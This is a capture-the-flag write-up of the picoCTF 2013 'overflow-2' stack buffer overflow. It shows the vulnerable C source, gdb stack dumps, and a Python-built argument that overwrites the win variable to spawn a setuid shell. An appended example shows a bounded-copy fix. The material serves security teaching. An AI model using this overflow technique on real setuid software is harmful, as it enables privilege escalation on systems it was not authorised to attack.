pico-ctf-2013 overflow-2

xiaoxiao, 2021-02-28

Stack overflow beginner series, tutorial 2

overflow2.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"

void vuln(int win, char *str)
{
    char buf[64];
    strcpy(buf, str);                 /* unbounded copy of argv[1] into a 64-byte buffer */
    dump_stack((void **) buf, 23, (void **) &win);
    printf("win = %d\n", win);
    if (win == 1) {                   /* win lives above buf on the stack, at ebp+0x8 */
        execl("/bin/sh", "sh", NULL);
    } else {
        printf("Sorry, you lose.\n");
    }
    exit(0);
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        printf("Usage: stack_overwrite [str]\n");
        return 1;
    }
    uid_t euid = geteuid();
    setresuid(euid, euid, euid);
    vuln(0, argv[1]);
    return 0;
}

dump_stack: prints the current stack contents.

gdb-peda$ checksec
CANARY    : disabled
FORTIFY   : disabled
NX        : disabled
PIE       : disabled
RELRO     : Partial

As this shows, the binary has essentially no protections. All we need to do is overflow the buffer so that win becomes 1. There are two approaches.

Approach 1:

gdb --args ./overflow2 $(python -c "print 'A'*64+'B'*4")

Debugging in gdb: since the source contains an if, we step into vuln and locate the assembly for that comparison, shown below:

0x8048666 <vuln+62>:  mov DWORD PTR [esp],eax
0x8048669 <vuln+65>:  call 0x80483f0 <printf@plt>
0x804866e <vuln+70>:  mov eax,DWORD PTR [ebp+0x8]
**0x8048671 <vuln+73>:  cmp eax,0x1**
0x8048674 <vuln+76>:  jne 0x8048694 <vuln+108>
0x8048676 <vuln+78>:  mov DWORD PTR [esp+0x8],0x0

So this time the value at address ebp+0x8 is compared with 1. As in the first article of this series, set a breakpoint at the cmp and inspect the stack contents.

gdb-peda$ x/90x 0xffffce20
0xffffce20: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce28: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce30: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce38: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce40: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce48: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce50: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce58: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce60: 0x42 0x42 0x42 0x42 0x00 0xf1 0xea 0xf7
0xffffce68: 0x98 0xce 0xff 0xff 0x0b 0x87 0x04 0x08
0xffffce70: 0x00 0x00 0x00 0x00 0x65 0xd1 0xff 0xff
0xffffce78: 0xe8 0x03

From the corresponding screenshot: ebp+0x8 = 0xffffce70, which is 0x50 bytes past the start of the char array (0xffffce70 - 0xffffce20). So we construct:

./overflow2 $(python -c "print 'A'*80+'\x01\x00\x00\x00'")

Result screenshot: (image). The approach is in fact much the same as in the first two articles of this series.

Approach 2: the idea is to write an automated script that loops and checks whether the overflow succeeded. The implementation is still somewhat tricky; I will write it up later.

Note: because of operating system differences, some addresses may differ, so always go by the addresses on your own machine. Related files: file link. Comments welcome!!!
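As an added example (not code from this writeup or from the pico CTF challenge), here is the hardened counterpart of vuln(): the unbounded strcpy is replaced by a length-checked copy that rejects input which does not fit, so an 80-byte argument can no longer reach the win parameter at ebp+0x8. The names copy_bounded, vuln_fixed and filler, the 128-byte scratch buffer, and the constructed inputs are my own assumptions.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SZ 64   /* same buffer size as vuln() in overflow2.c */

/* Bounded replacement for strcpy(buf, str): copies src into dst[dstsz] only if
 * its NUL lies within dstsz bytes; otherwise returns -1 and leaves dst empty. */
int copy_bounded(char *dst, size_t dstsz, const char *src)
{
    const char *nul = memchr(src, '\0', dstsz);  /* never scans past dstsz */
    if (nul == NULL) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);   /* length + NUL, fits */
    return 0;
}

/* Hardened vuln(): same signature, but the copy cannot overrun buf, so the
 * win parameter keeps the value main() passed. Returns win, or -1 if the
 * input was rejected (the original would spawn a shell when win == 1). */
int vuln_fixed(int win, const char *str)
{
    char buf[BUF_SZ];
    if (copy_bounded(buf, sizeof buf, str) != 0) {
        printf("input too long (max %d bytes)\n", BUF_SZ - 1);
        return -1;
    }
    printf("win = %d\n", win);
    return win;
}

/* Constructed input: n bytes of 'A' plus an optional 0x01, the shape of the
 * writeup's 80-byte payload (argv carries no NULs; strcpy adds the 0x00). */
const char *filler(size_t n, int append_one)
{
    static char s[128];
    memset(s, 'A', n);
    if (append_one) s[n++] = '\x01';
    s[n] = '\0';
    return s;
}

int main(void)
{
    return vuln_fixed(0, filler(80, 1));   /* prints the rejection, returns -1 */
}
```

A 63-byte argument (plus its NUL) is the longest input accepted; 64 bytes or more, including the 80-byte payload, is refused before anything is written to the stack.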

Please credit the original when reposting: https://www.6miu.com/read-64449.html
